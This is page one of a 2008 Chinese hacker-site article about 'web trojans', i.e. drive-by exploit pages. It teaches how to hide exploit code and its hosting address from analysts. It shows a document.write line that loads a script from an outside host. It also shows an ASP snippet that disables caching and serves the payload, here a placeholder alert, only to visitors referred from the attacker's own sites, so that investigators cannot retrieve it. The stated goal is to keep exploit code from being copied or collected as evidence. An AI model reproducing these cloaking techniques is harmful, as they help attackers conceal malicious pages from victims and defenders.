黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 黑客入门 >> 电脑新手 >> 正文
·网马的运行分析续篇05-27·IE的0DAY网马05-27
·XP下双开3389远程控制的05-27·利用IAT hook实现window05-27
·让Windows Server 2008上05-27·让Windows Vista插上MAC05-25
·萤火虫无限量免费网盘05-25·窝窝免费空间网提供100M05-25
·社会工程学巧骗网易相册05-23·详解还原系统保护技术原05-23
·一条命令免疫autorun.in05-23·Mantis多个输入验证漏洞05-23
·PHP168 X-Forwarded-For05-23·首页巡警v1.1/1.0 本地提05-23
·Firefox安全设置05-23·火眼金睛如何识别系统恶05-23
·易联网络为您提供150m美05-23·巧妙查看Windows Server05-22
·玩转卡巴斯基的19招,让05-22·建立一个别人不能碰的无05-21
·卸诺顿 WinXP丢失IP无法05-21·揭秘灰鸽子运行原理(含手05-21
·DIY QQ:想要啥样就改啥样05-21·PCSHARE VIP 2005源代码05-21
·NBSI_1.157源代码05-21·刷BIOS到EFI破解,Vista05-21
·弘毅网提供100M免费asp空05-21·转移Vista脱机文件减压V05-20
[推荐]网马的运行分析续篇
        ★★★★★

网马的运行分析续篇

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2008-5-27 9:27:14

余弦不久之前写了网马中枢,是关于服务端应用的一小角,他还说有其他更复杂的应用,一直等着他的BLOG更新,还是未见他写出来。最近大家都很忙。

关于网马代码,exploit固然重要,但除了exploit之外的网马框架加强对于网马功能扩展也是必然的发展趋势。网马中枢里面用了include ,读取文件等方式来隐藏EXP的地址,不过,EXP代码完全暴露出来了,那就无法阻止代码被剽窃,被取证等行为。

我已经很久没有写点什么了,就放一点服务端技术的应用和小注释吧。不是什么新技术,只是实现一些在现实中比较实用的东西,大牛赶紧飘过。

我们已经有了网马中枢了,那么,如何来隐藏我们的EXP代码以及地址呢?哈哈。这不难。跟着我的思路吧。

——————华丽地分割——————–

利用网马中枢提到的include ,读取文件这2个方式,已经可以隐藏了地址,在最后调用的HTM(last_trojan.html)写入以下代码:

以下是引用片段:
document.write(”<script src=http://www.scanw.com/blog/done.asp></script>”);

/*继续调用一个JS文件*/

在done.asp里写入以下代码:

以下是引用片段:
<%
Response.Buffer   =   True
Response.ExpiresAbsolute   =   Now()   -   1
Response.Expires   =   0
Response.CacheControl   =   “no-cache”
Response.AddHeader   “Pragma”,   “No-Cache”
Dim hr
hr=Request.ServerVariables(”HTTP_REFERER”)
If InStr(hr,”greysign”) > 0 or InStr(hr,”scanw”) > 0 Then
%>
alert(’aaa’)
<%
End If
%>

这个代码的作用是:打开缓存,将页面设置为立即过期,Now()   -   1设置不留缓存文件,这样可以在用户点后退的时候没有缓存文件可以查看,变成直接的HTTP请求,然后获取HTTP_REFERER,判断 HTTP_REFERER来源玉米是否带有我们的字符串(即判断来源网站是否是我们的网站),假如包含字符串,就执行alert(’aaa’),假如不包 含(不是来自我们的网站的连接请求),那么就什么都不返回执行。

结合以上的所有手段,我们就实现了地址隐藏和代码隐藏了。

[1] [2] 下一页

文章录入:cainiaowang    责任编辑:xinlian 
  • 上一篇文章:

  • 下一篇文章: 没有了
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    VIP 专 区
    Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886